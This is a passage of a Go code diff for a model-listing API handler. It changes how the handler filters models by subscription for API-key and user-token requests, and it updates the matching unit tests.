+ c.JSON(http.StatusForbidden, gin.H{ + "error": gin.H{ + "message": "API key has no subscription bound", + "type": "permission_error", + }}) + return + } + + // Determine behavior based on auth method: + // - API key with subscription → filter by that subscription (requestedSubscription != "") + // - User token → return all accessible models (requestedSubscription == "") + returnAllModels := !isAPIKeyRequest && requestedSubscription == "" - // Validate subscription access before probing models. 
- // This ensures consistent error handling with inferencing endpoints. - var selectedSubscription string + // Get user context for subscription selection + var userContext *token.UserContext if h.subscriptionSelector != nil { // Extract user info from context (set by ExtractUserInfo middleware) - // Only needed when subscription selector is configured userContextVal, exists := c.Get("user") if !exists { h.logger.Error("User context not found - ExtractUserInfo middleware not called") @@ -78,7 +220,8 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) { }}) return } - userContext, ok := userContextVal.(*token.UserContext) + var ok bool + userContext, ok = userContextVal.(*token.UserContext) if !ok { h.logger.Error("Invalid user context type") c.JSON(http.StatusInternalServerError, gin.H{ @@ -88,80 +231,28 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) { }}) return } + } - result, err := h.subscriptionSelector.Select(userContext.Groups, userContext.Username, requestedSubscription) - if err != nil { - var multipleSubsErr *subscription.MultipleSubscriptionsError - var accessDeniedErr *subscription.AccessDeniedError - var notFoundErr *subscription.SubscriptionNotFoundError - var noSubErr *subscription.NoSubscriptionError - - // For consistency with inferencing (which uses Authorino and returns 403 for all - // subscription errors), we return 403 Forbidden for all subscription-related errors. 
- if errors.As(err, &multipleSubsErr) { - h.logger.Debug("User has multiple subscriptions, x-maas-subscription header required", - "subscriptionCount", len(multipleSubsErr.Subscriptions), - ) - c.JSON(http.StatusForbidden, gin.H{ - "error": gin.H{ - "message": err.Error(), - "type": "permission_error", - }}) - return - } - - if errors.As(err, &accessDeniedErr) { - h.logger.Debug("Access denied to subscription") - c.JSON(http.StatusForbidden, gin.H{ - "error": gin.H{ - "message": err.Error(), - "type": "permission_error", - }}) - return - } - - if errors.As(err, ¬FoundErr) { - h.logger.Debug("Subscription not found") - c.JSON(http.StatusForbidden, gin.H{ - "error": gin.H{ - "message": err.Error(), - "type": "permission_error", - }}) - return - } - - if errors.As(err, &noSubErr) { - h.logger.Debug("No subscription found for user") - c.JSON(http.StatusForbidden, gin.H{ - "error": gin.H{ - "message": err.Error(), - "type": "permission_error", - }}) - return - } - - // Other errors are internal server errors - h.logger.Error("Subscription selection failed", - "error", err, - ) - c.JSON(http.StatusInternalServerError, gin.H{ - "error": gin.H{ - "message": "Failed to select subscription", - "type": "server_error", - }}) - return - } - // Use the selected subscription (which may be auto-selected if user only has one) - selectedSubscription = result.Name + // Log the authentication method and filtering behavior + if requestedSubscription != "" { + h.logger.Debug("API key request - filtering models by subscription", + "subscription", requestedSubscription, + ) } else { - // If no selector configured, use the requested subscription header as-is - selectedSubscription = requestedSubscription + h.logger.Debug("User token request - returning all accessible models") + } + + // Determine which subscriptions to use for model filtering + subscriptionsToUse, shouldReturn := h.selectSubscriptionsForListing(c, userContext, requestedSubscription, returnAllModels) + if shouldReturn { + 
return } - var modelList []models.Model - if h.maasModelRefLister != nil && h.maasModelNamespace != "" { - h.logger.Debug("Listing models from MaaSModelRef cache", "namespace", h.maasModelNamespace) - list, err := models.ListFromMaaSModelRefLister(h.maasModelRefLister, h.maasModelNamespace) + // Initialize to empty slice (not nil) so JSON marshals as [] instead of null + modelList := []models.Model{} + if h.maasModelRefLister != nil { + h.logger.Debug("Listing models from MaaSModelRef cache (all namespaces)") + list, err := models.ListFromMaaSModelRefLister(h.maasModelRefLister) if err != nil { h.logger.Error("Listing from MaaSModelRef failed", "error", err) c.JSON(http.StatusInternalServerError, gin.H{ @@ -171,11 +262,98 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) { }}) return } - h.logger.Debug("MaaSModelRef list succeeded, validating access by probing each model endpoint", "modelCount", len(list), "subscriptionHeaderProvided", selectedSubscription != "") - modelList = h.modelMgr.FilterModelsByAccess(c.Request.Context(), list, authHeader, selectedSubscription) - h.logger.Debug("Access validation complete", "listed", len(list), "accessible", len(modelList)) + + // Distinguish between "no subscription system" and "user has zero subscriptions" + if len(subscriptionsToUse) == 0 { + if h.subscriptionSelector == nil { + // Legacy case: no subscription system configured + h.logger.Debug("No subscription system configured, filtering models without subscription header") + modelList = h.modelMgr.FilterModelsByAccess(c.Request.Context(), list, authHeader, "") + } else { + // User has zero accessible subscriptions - return empty list + h.logger.Debug("User has zero accessible subscriptions, returning empty model list") + // modelList is already initialized to empty slice above + } + } else { + // Filter models by subscription(s) and aggregate subscriptions + // Deduplication key is (model ID, URL, OwnedBy) - models with the same ID, URL, and + // MaaSModelRef 
(namespace/name) are the same instance and should have their + // subscriptions aggregated into an array. + type modelKey struct { + id string + url string + ownedBy string + } + modelsByKey := make(map[modelKey]*models.Model) + + for _, sub := range subscriptionsToUse { + // Pre-filter by modelRefs if available (optimization to reduce HTTP calls) + modelsToCheck := list + if len(sub.ModelRefs) > 0 { + h.logger.Debug("Pre-filtering models by subscription modelRefs", + "subscription", sub.Name, + "totalModels", len(list), + "modelRefsCount", len(sub.ModelRefs), + ) + modelsToCheck = filterModelsBySubscription(list, sub.ModelRefs) + h.logger.Debug("After modelRef filtering", "modelsToCheck", len(modelsToCheck)) + } + + // Always probe with the subscription header for access validation + // For API keys: uses the subscription bound to the key (bare name format) + // For user tokens: uses each accessible subscription to check which models are available + // Using bare name format to match what's stored in API keys + probeSubscriptionHeader := sub.Name + h.logger.Debug("Filtering models by subscription", "subscription", sub.Name, "modelCount", len(modelsToCheck), "probeWithSubscriptionHeader", probeSubscriptionHeader != "") + filteredModels := h.modelMgr.FilterModelsByAccess(c.Request.Context(), modelsToCheck, authHeader, probeSubscriptionHeader) + + for _, model := range filteredModels { + subInfo := models.SubscriptionInfo{ + Name: sub.Name, + DisplayName: sub.DisplayName, + Description: sub.Description, + } + + // Create key from model ID, URL, and OwnedBy (namespace/name of MaaSModelRef) + urlStr := "" + if model.URL != nil { + urlStr = model.URL.String() + } + key := modelKey{id: model.ID, url: urlStr, ownedBy: model.OwnedBy} + + if existingModel, exists := modelsByKey[key]; exists { + // Model already exists - append subscription if not already present + h.addSubscriptionIfNew(existingModel, subInfo) + } else { + // New model - create entry with subscriptions 
array + model.Subscriptions = []models.SubscriptionInfo{subInfo} + modelsByKey[key] = &model + } + } + } + + // Convert map to slice with deterministic ordering + keys := make([]modelKey, 0, len(modelsByKey)) + for k := range modelsByKey { + keys = append(keys, k) + } + sort.Slice(keys, func(i, j int) bool { + if keys[i].id != keys[j].id { + return keys[i].id < keys[j].id + } + if keys[i].url != keys[j].url { + return keys[i].url < keys[j].url + } + return keys[i].ownedBy < keys[j].ownedBy + }) + for _, k := range keys { + modelList = append(modelList, *modelsByKey[k]) + } + } + + h.logger.Debug("Access validation complete", "listed", len(list), "accessible", len(modelList), "subscriptions", len(subscriptionsToUse)) } else { - h.logger.Debug("MaaSModelRef not configured (lister or namespace unset), returning empty model list") + h.logger.Debug("MaaSModelRef lister not configured, returning empty model list") } h.logger.Debug("GET /v1/models returning models", "count", len(modelList)) @@ -184,3 +362,29 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) { Data: modelList, }) } + +// filterModelsBySubscription filters models to only those matching the subscription's modelRefs. 
+func filterModelsBySubscription(modelList []models.Model, modelRefs []subscription.ModelRefInfo) []models.Model { + if len(modelRefs) == 0 { + return modelList + } + + // Build map of allowed models for fast lookup + allowed := make(map[string]bool) + for _, ref := range modelRefs { + key := ref.Namespace + "/" + ref.Name + allowed[key] = true + } + + // Filter models + filtered := make([]models.Model, 0, len(modelList)) + for _, model := range modelList { + // Models from MaaSModelRefLister have OwnedBy set to namespace/name + modelKey := model.OwnedBy + if allowed[modelKey] { + filtered = append(filtered, model) + } + } + + return filtered +} diff --git a/maas-api/internal/handlers/models_test.go b/maas-api/internal/handlers/models_test.go index 0707f762c..4f8c94908 100644 --- a/maas-api/internal/handlers/models_test.go +++ b/maas-api/internal/handlers/models_test.go @@ -33,8 +33,8 @@ const ( maasModelRefGVRResource = "maasmodelrefs" ) -// maasModelRefUnstructured returns an unstructured MaaSModelRef for testing (name, namespace, endpoint URL, ready). -func maasModelRefUnstructured(name, namespace, endpoint string, ready bool) *unstructured.Unstructured { +// maasModelRefUnstructured returns an unstructured MaaSModelRef for testing (name, namespace, endpoint URL, ready, annotations). +func maasModelRefUnstructured(name, namespace, endpoint string, ready bool, annotations map[string]string) *unstructured.Unstructured { u := &unstructured.Unstructured{} u.SetGroupVersionKind(schema.GroupVersionKind{ Group: maasModelRefGVRGroup, @@ -49,20 +49,22 @@ func maasModelRefUnstructured(name, namespace, endpoint string, ready bool) *uns _ = unstructured.SetNestedField(u.Object, "Ready", "status", "phase") } _ = unstructured.SetNestedField(u.Object, "llmisvc", "spec", "modelRef", "kind") + if len(annotations) > 0 { + u.SetAnnotations(annotations) + } return u } // fakeMaaSModelRefLister implements models.MaaSModelRefLister for tests (namespace -> items). 
type fakeMaaSModelRefLister map[string][]*unstructured.Unstructured -func (f fakeMaaSModelRefLister) List(namespace string) ([]*unstructured.Unstructured, error) { - items := f[namespace] - if items == nil { - return nil, nil - } - out := make([]*unstructured.Unstructured, len(items)) - for i, u := range items { - out[i] = u.DeepCopy() +func (f fakeMaaSModelRefLister) List() ([]*unstructured.Unstructured, error) { + // Return all items from all namespaces + var out []*unstructured.Unstructured + for _, items := range f { + for _, u := range items { + out = append(out, u.DeepCopy()) + } } return out, nil } @@ -263,10 +265,12 @@ func TestListingModels(t *testing.T) { constant.AnnotationDescription: "A large language model for general AI tasks", constant.AnnotationDisplayName: "Test Model Alpha", }, - // MaaSModelRef listing does not populate Details from annotations. AssertDetails: func(t *testing.T, model models.Model) { t.Helper() - _ = model + require.NotNil(t, model.Details, "Expected modelDetails to be populated from annotations") + assert.Equal(t, "Test Model Alpha", model.Details.DisplayName) + assert.Equal(t, "A large language model for general AI tasks", model.Details.Description) + assert.Equal(t, "General purpose LLM", model.Details.GenAIUseCase) }, }, { @@ -279,10 +283,12 @@ func TestListingModels(t *testing.T) { Annotations: map[string]string{ constant.AnnotationDisplayName: "Test Model Beta", }, - // MaaSModelRef listing does not populate Details. 
AssertDetails: func(t *testing.T, model models.Model) { t.Helper() - _ = model + require.NotNil(t, model.Details, "Expected modelDetails to be populated from annotations") + assert.Equal(t, "Test Model Beta", model.Details.DisplayName) + assert.Empty(t, model.Details.Description) + assert.Empty(t, model.Details.GenAIUseCase) }, }, { @@ -305,7 +311,7 @@ func TestListingModels(t *testing.T) { maasModelRefItems := make([]*unstructured.Unstructured, 0, len(llmTestScenarios)) for _, s := range llmTestScenarios { endpoint := s.URL.String() - maasModelRefItems = append(maasModelRefItems, maasModelRefUnstructured(s.Name, fixtures.TestNamespace, endpoint, s.Ready)) + maasModelRefItems = append(maasModelRefItems, maasModelRefUnstructured(s.Name, fixtures.TestNamespace, endpoint, s.Ready, s.Annotations)) } maasModelRefLister := fakeMaaSModelRefLister{fixtures.TestNamespace: maasModelRefItems} @@ -324,7 +330,7 @@ func TestListingModels(t *testing.T) { // Create a mock subscription selector that auto-selects for single subscription users subscriptionSelector := subscription.NewSelector(testLogger, &fakeSubscriptionLister{}) - modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister, fixtures.TestNamespace) + modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister) // Create token handler to extract user info middleware tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant) @@ -403,13 +409,14 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { testLogger := logger.Development() // Create mock servers that require specific subscription headers + // Use bare subscription names to match what Authorino injects from API key validation premiumModelServer := createMockModelServerWithSubscriptionCheck(t, "premium-model", "premium") freeModelServer := createMockModelServerWithSubscriptionCheck(t, "free-model", "free") // Build MaaSModelRef unstructured list 
maasModelRefItems := []*unstructured.Unstructured{ - maasModelRefUnstructured("premium-model", fixtures.TestNamespace, premiumModelServer.URL, true), - maasModelRefUnstructured("free-model", fixtures.TestNamespace, freeModelServer.URL, true), + maasModelRefUnstructured("premium-model", fixtures.TestNamespace, premiumModelServer.URL, true, nil), + maasModelRefUnstructured("free-model", fixtures.TestNamespace, freeModelServer.URL, true, nil), } maasModelRefLister := fakeMaaSModelRefLister{fixtures.TestNamespace: maasModelRefItems} @@ -431,13 +438,13 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { } subscriptionSelector := subscription.NewSelector(testLogger, multiSubLister) - modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister, fixtures.TestNamespace) + modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister) tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant) v1 := router.Group("/v1") v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs) - // Table-driven tests for subscription header variants + // Table-driven tests for API key auth (X-MaaS-Subscription header injected by Authorino) subscriptionTests := []struct { name string subscription string @@ -446,14 +453,14 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { expectedModelCount int }{ { - name: "with premium subscription header", + name: "API key - premium subscription", subscription: "premium", userGroups: `["premium-users"]`, expectedModelID: "premium-model", expectedModelCount: 1, }, { - name: "with free subscription header", + name: "API key - free subscription", subscription: "free", userGroups: `["free-users"]`, expectedModelID: "free-model", @@ -468,6 +475,7 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { require.NoError(t, err, "Failed to create request") req.Header.Set("Authorization", "Bearer valid-token") + // Simulate 
Authorino injecting X-MaaS-Subscription from API key validation req.Header.Set("X-Maas-Subscription", tt.subscription) req.Header.Set(constant.HeaderUsername, "test-user@example.com") req.Header.Set(constant.HeaderGroup, tt.userGroups) @@ -484,7 +492,7 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { }) } - t.Run("without subscription header - single subscription auto-selects", func(t *testing.T) { + t.Run("user token - single subscription returns all models", func(t *testing.T) { w := httptest.NewRecorder() req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) require.NoError(t, err, "Failed to create request") @@ -500,12 +508,13 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { err = json.Unmarshal(w.Body.Bytes(), &response) require.NoError(t, err, "Failed to unmarshal response body") - // User only has access to "free" subscription, so it auto-selects and returns free model - require.Len(t, response.Data, 1, "Expected one model with auto-selected free subscription") + // User token (no X-MaaS-Subscription header) returns all accessible models + // User only has access to "free" subscription, so returns that one model + require.Len(t, response.Data, 1, "Expected one model from accessible subscription") assert.Equal(t, "free-model", response.Data[0].ID) }) - t.Run("without subscription header - multiple subscriptions requires header", func(t *testing.T) { + t.Run("without subscription header - user token returns all models", func(t *testing.T) { w := httptest.NewRecorder() req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) require.NoError(t, err, "Failed to create request") @@ -515,32 +524,37 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { req.Header.Set(constant.HeaderGroup, `["free-users", "premium-users"]`) router.ServeHTTP(w, req) - // User has access to both subscriptions, must specify which one - // Returns 403 for consistency with inferencing 
(Authorino limitation) - require.Equal(t, http.StatusForbidden, w.Code, "Expected 403 Forbidden") + // User token (no X-MaaS-Subscription header) returns all accessible models + require.Equal(t, http.StatusOK, w.Code, "Expected status OK") - var errorResponse map[string]any - err = json.Unmarshal(w.Body.Bytes(), &errorResponse) - require.NoError(t, err, "Failed to unmarshal error response") + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err, "Failed to unmarshal response body") + + // User has access to both subscriptions, should return both models + require.Len(t, response.Data, 2, "Expected both models from both subscriptions") - errorObj, ok := errorResponse["error"].(map[string]any) - require.True(t, ok, "Expected error object") - assert.Equal(t, "permission_error", errorObj["type"]) + modelIDs := make(map[string]bool) + for _, model := range response.Data { + modelIDs[model.ID] = true + } + assert.True(t, modelIDs["premium-model"], "Should include premium model") + assert.True(t, modelIDs["free-model"], "Should include free model") }) - // Table-driven tests for subscription error scenarios + // Table-driven tests for API key subscription error scenarios subscriptionErrorTests := []struct { name string subscription string userGroups string }{ { - name: "unknown subscription header - returns 403", + name: "API key - unknown subscription - returns 403", subscription: "nonexistent-subscription", userGroups: `["free-users"]`, }, { - name: "subscription user lacks access to - returns 403", + name: "API key - no access to subscription - returns 403", subscription: "premium", userGroups: `["free-users"]`, }, @@ -570,3 +584,614 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) { }) } } +func TestListModels_ReturnAllModels(t *testing.T) { + testLogger := logger.Development() + + // Create mock servers for models + // Use bare subscription names to match what Authorino injects from API key 
validation + model1Server := createMockModelServerWithSubscriptionCheck(t, "model-1", "sub-a") + model2Server := createMockModelServerWithSubscriptionCheck(t, "model-2", "sub-b") + model3Server := createMockModelServerWithSubscriptionCheck(t, "model-3", "sub-a") + + // Setup MaaSModelRef lister with three models + lister := fakeMaaSModelRefLister{ + "test-ns": []*unstructured.Unstructured{ + maasModelRefUnstructured("model-1", "test-ns", model1Server.URL, true, nil), + maasModelRefUnstructured("model-2", "test-ns", model2Server.URL, true, nil), + maasModelRefUnstructured("model-3", "test-ns", model3Server.URL, true, nil), + }, + } + + // Setup subscription lister with display metadata + createSubscriptionWithMeta := func(name string, groups []string, displayName, description string) *unstructured.Unstructured { + sub := &unstructured.Unstructured{} + sub.SetGroupVersionKind(schema.GroupVersionKind{ + Group: "maas.opendatahub.io", + Version: "v1alpha1", + Kind: "MaaSSubscription", + }) + sub.SetName(name) + sub.SetNamespace(fixtures.TestNamespace) + + groupSlice := make([]any, len(groups)) + for i, g := range groups { + groupSlice[i] = map[string]any{"name": g} + } + + spec := map[string]any{ + "owner": map[string]any{ + "groups": groupSlice, + }, + } + + _ = unstructured.SetNestedMap(sub.Object, spec, "spec") + + if displayName != "" || description != "" { + annotations := map[string]string{} + if displayName != "" { + annotations[constant.AnnotationDisplayName] = displayName + } + if description != "" { + annotations[constant.AnnotationDescription] = description + } + sub.SetAnnotations(annotations) + } + + return sub + } + + subscriptionLister := &fakeSubscriptionListerWithMeta{ + subscriptions: []*unstructured.Unstructured{ + createSubscriptionWithMeta("sub-a", []string{"group-a"}, "Subscription A", "Description for A"), + createSubscriptionWithMeta("sub-b", []string{"group-b"}, "Subscription B", "Description for B"), + }, + } + + modelMgr, err := 
models.NewManager(testLogger) + require.NoError(t, err) + + subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister) + modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister) + + config := fixtures.TestServerConfig{Objects: []runtime.Object{}} + router, _ := fixtures.SetupTestServer(t, config) + + _, cleanup := fixtures.StubTokenProviderAPIs(t, true) + defer cleanup() + + tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant) + v1 := router.Group("/v1") + v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs) + + t.Run("user token - returns all models from all subscriptions", func(t *testing.T) { + w := httptest.NewRecorder() + req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) + require.NoError(t, err) + + req.Header.Set("Authorization", "Bearer valid-token") + // No X-MaaS-Subscription header = user token authentication + req.Header.Set(constant.HeaderUsername, "test-user@example.com") + req.Header.Set(constant.HeaderGroup, `["group-a", "group-b"]`) + router.ServeHTTP(w, req) + + require.Equal(t, http.StatusOK, w.Code) + + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + assert.Equal(t, "list", response.Object) + assert.Len(t, response.Data, 3, "Should return all 3 models from both subscriptions") + + // Verify subscription info is attached + subscriptionNames := make(map[string]bool) + for _, model := range response.Data { + require.NotEmpty(t, model.Subscriptions, "Subscriptions array should not be empty") + for _, sub := range model.Subscriptions { + subscriptionNames[sub.Name] = true + } + } + + assert.True(t, subscriptionNames["sub-a"], "Should have models from sub-a") + assert.True(t, subscriptionNames["sub-b"], "Should have models from sub-b") + }) + + t.Run("user token - returns empty list when user has no subscriptions", func(t *testing.T) { + 
emptySubscriptionLister := &fakeSubscriptionListerWithMeta{ + subscriptions: []*unstructured.Unstructured{ + createSubscriptionWithMeta("sub-a", []string{"other-group"}, "", ""), + }, + } + + subscriptionSelector := subscription.NewSelector(testLogger, emptySubscriptionLister) + emptyHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister) + + config := fixtures.TestServerConfig{Objects: []runtime.Object{}} + router2, _ := fixtures.SetupTestServer(t, config) + + _, cleanup2 := fixtures.StubTokenProviderAPIs(t, true) + defer cleanup2() + + tokenHandler2 := token.NewHandler(testLogger, fixtures.TestTenant) + v1_2 := router2.Group("/v1") + v1_2.GET("/models", tokenHandler2.ExtractUserInfo(), emptyHandler.ListLLMs) + + w := httptest.NewRecorder() + req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) + require.NoError(t, err) + + req.Header.Set("Authorization", "Bearer valid-token") + // No X-MaaS-Subscription header = user token authentication + req.Header.Set(constant.HeaderUsername, "test-user@example.com") + req.Header.Set(constant.HeaderGroup, `["user-group"]`) + router2.ServeHTTP(w, req) + + require.Equal(t, http.StatusOK, w.Code) + + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + assert.Equal(t, "list", response.Object) + assert.Empty(t, response.Data, "Should return empty list when user has no subscriptions") + }) + + t.Run("user token - attaches subscription metadata to models", func(t *testing.T) { + w := httptest.NewRecorder() + req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) + require.NoError(t, err) + + req.Header.Set("Authorization", "Bearer valid-token") + // No X-MaaS-Subscription header = user token authentication + req.Header.Set(constant.HeaderUsername, "test-user@example.com") + req.Header.Set(constant.HeaderGroup, `["group-a"]`) + router.ServeHTTP(w, req) + + 
require.Equal(t, http.StatusOK, w.Code) + + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + // Find model-1 which should have sub-a metadata + var model1 *models.Model + for i := range response.Data { + if response.Data[i].ID == "model-1" { + model1 = &response.Data[i] + break + } + } + + require.NotNil(t, model1, "model-1 should be in response") + require.NotEmpty(t, model1.Subscriptions, "Subscriptions array should not be empty") + require.Len(t, model1.Subscriptions, 1, "model-1 should have exactly 1 subscription") + assert.Equal(t, "sub-a", model1.Subscriptions[0].Name) + assert.Equal(t, "Subscription A", model1.Subscriptions[0].DisplayName) + assert.Equal(t, "Description for A", model1.Subscriptions[0].Description) + }) +} + +// fakeSubscriptionListerWithMeta implements subscription.Lister with custom subscriptions. +type fakeSubscriptionListerWithMeta struct { + subscriptions []*unstructured.Unstructured +} + +func (f *fakeSubscriptionListerWithMeta) List() ([]*unstructured.Unstructured, error) { + return f.subscriptions, nil +} + +func TestListModels_DeduplicationBySubscription(t *testing.T) { + testLogger := logger.Development() + + // Create a mock server that responds to both subscriptions + modelServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(http.StatusOK) + _, _ = w.Write(makeModelsResponse("shared-model")) + })) + t.Cleanup(modelServer.Close) + + // Setup MaaSModelRef lister with one model + lister := fakeMaaSModelRefLister{ + "test-ns": []*unstructured.Unstructured{ + maasModelRefUnstructured("shared-model", "test-ns", modelServer.URL, true, nil), + }, + } + + // Setup two subscriptions that both have access to the same model + createSubscription := func(name string, groups []string) *unstructured.Unstructured { + sub := &unstructured.Unstructured{} + 
sub.SetGroupVersionKind(schema.GroupVersionKind{ + Group: "maas.opendatahub.io", + Version: "v1alpha1", + Kind: "MaaSSubscription", + }) + sub.SetName(name) + sub.SetNamespace(fixtures.TestNamespace) + + groupSlice := make([]any, len(groups)) + for i, g := range groups { + groupSlice[i] = map[string]any{"name": g} + } + + _ = unstructured.SetNestedMap(sub.Object, map[string]any{ + "owner": map[string]any{ + "groups": groupSlice, + }, + }, "spec") + return sub + } + + subscriptionLister := &fakeSubscriptionListerWithMeta{ + subscriptions: []*unstructured.Unstructured{ + createSubscription("sub-a", []string{"user-group"}), + createSubscription("sub-b", []string{"user-group"}), + }, + } + + modelMgr, err := models.NewManager(testLogger) + require.NoError(t, err) + + subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister) + modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister) + + config := fixtures.TestServerConfig{Objects: []runtime.Object{}} + router, _ := fixtures.SetupTestServer(t, config) + + _, cleanup := fixtures.StubTokenProviderAPIs(t, true) + defer cleanup() + + tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant) + v1 := router.Group("/v1") + v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs) + + t.Run("same model in different subscriptions aggregates into subscriptions array", func(t *testing.T) { + w := httptest.NewRecorder() + req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) + require.NoError(t, err) + + req.Header.Set("Authorization", "Bearer valid-token") + req.Header.Set("X-Maas-Return-All-Models", "true") + req.Header.Set(constant.HeaderUsername, "test-user@example.com") + req.Header.Set(constant.HeaderGroup, `["user-group"]`) + router.ServeHTTP(w, req) + + require.Equal(t, http.StatusOK, w.Code) + + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, 
err) + + // Should have 1 entry with 2 subscriptions aggregated + assert.Len(t, response.Data, 1, "Same model instance should aggregate subscriptions into one entry") + + model := response.Data[0] + assert.Equal(t, "shared-model", model.ID) + + // Should have 2 subscriptions in the array + require.Len(t, model.Subscriptions, 2, "Model should have 2 subscriptions") + + subscriptionNames := []string{ + model.Subscriptions[0].Name, + model.Subscriptions[1].Name, + } + + assert.Contains(t, subscriptionNames, "sub-a") + assert.Contains(t, subscriptionNames, "sub-b") + }) +} + +func TestListModels_DifferentModelRefsWithSameModelID(t *testing.T) { + testLogger := logger.Development() + + // Create two mock servers that both return the same model ID "gpt-4" + // but represent different MaaSModelRef instances + modelServerA := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(http.StatusOK) + _, _ = w.Write(makeModelsResponse("gpt-4")) + })) + t.Cleanup(modelServerA.Close) + + modelServerB := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(http.StatusOK) + _, _ = w.Write(makeModelsResponse("gpt-4")) + })) + t.Cleanup(modelServerB.Close) + + // Setup MaaSModelRef lister with two different MaaSModelRefs that return same model ID + lister := fakeMaaSModelRefLister{ + "namespace-a": []*unstructured.Unstructured{ + maasModelRefUnstructured("gpt-4-ref", "namespace-a", modelServerA.URL, true, nil), + }, + "namespace-b": []*unstructured.Unstructured{ + maasModelRefUnstructured("gpt-4-ref", "namespace-b", modelServerB.URL, true, nil), + }, + } + + // Setup single subscription + createSubscription := func(name string, groups []string) *unstructured.Unstructured { + sub := &unstructured.Unstructured{} + sub.SetGroupVersionKind(schema.GroupVersionKind{ + Group: "maas.opendatahub.io", 
+ Version: "v1alpha1", + Kind: "MaaSSubscription", + }) + sub.SetName(name) + sub.SetNamespace(fixtures.TestNamespace) + + groupSlice := make([]any, len(groups)) + for i, g := range groups { + groupSlice[i] = map[string]any{"name": g} + } + + _ = unstructured.SetNestedMap(sub.Object, map[string]any{ + "owner": map[string]any{ + "groups": groupSlice, + }, + }, "spec") + return sub + } + + subscriptionLister := &fakeSubscriptionListerWithMeta{ + subscriptions: []*unstructured.Unstructured{ + createSubscription("sub-a", []string{"user-group"}), + }, + } + + modelMgr, err := models.NewManager(testLogger) + require.NoError(t, err) + + subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister) + modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister) + + config := fixtures.TestServerConfig{Objects: []runtime.Object{}} + router, _ := fixtures.SetupTestServer(t, config) + + _, cleanup := fixtures.StubTokenProviderAPIs(t, true) + defer cleanup() + + tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant) + v1 := router.Group("/v1") + v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs) + + t.Run("different MaaSModelRefs with same model ID but different URLs return separate entries", func(t *testing.T) { + w := httptest.NewRecorder() + req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) + require.NoError(t, err) + + req.Header.Set("Authorization", "Bearer valid-token") + req.Header.Set("X-Maas-Return-All-Models", "true") + req.Header.Set(constant.HeaderUsername, "test-user@example.com") + req.Header.Set(constant.HeaderGroup, `["user-group"]`) + router.ServeHTTP(w, req) + + require.Equal(t, http.StatusOK, w.Code) + + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + // Should have 2 entries because URLs are different (deduplication by model ID + URL) + assert.Len(t, 
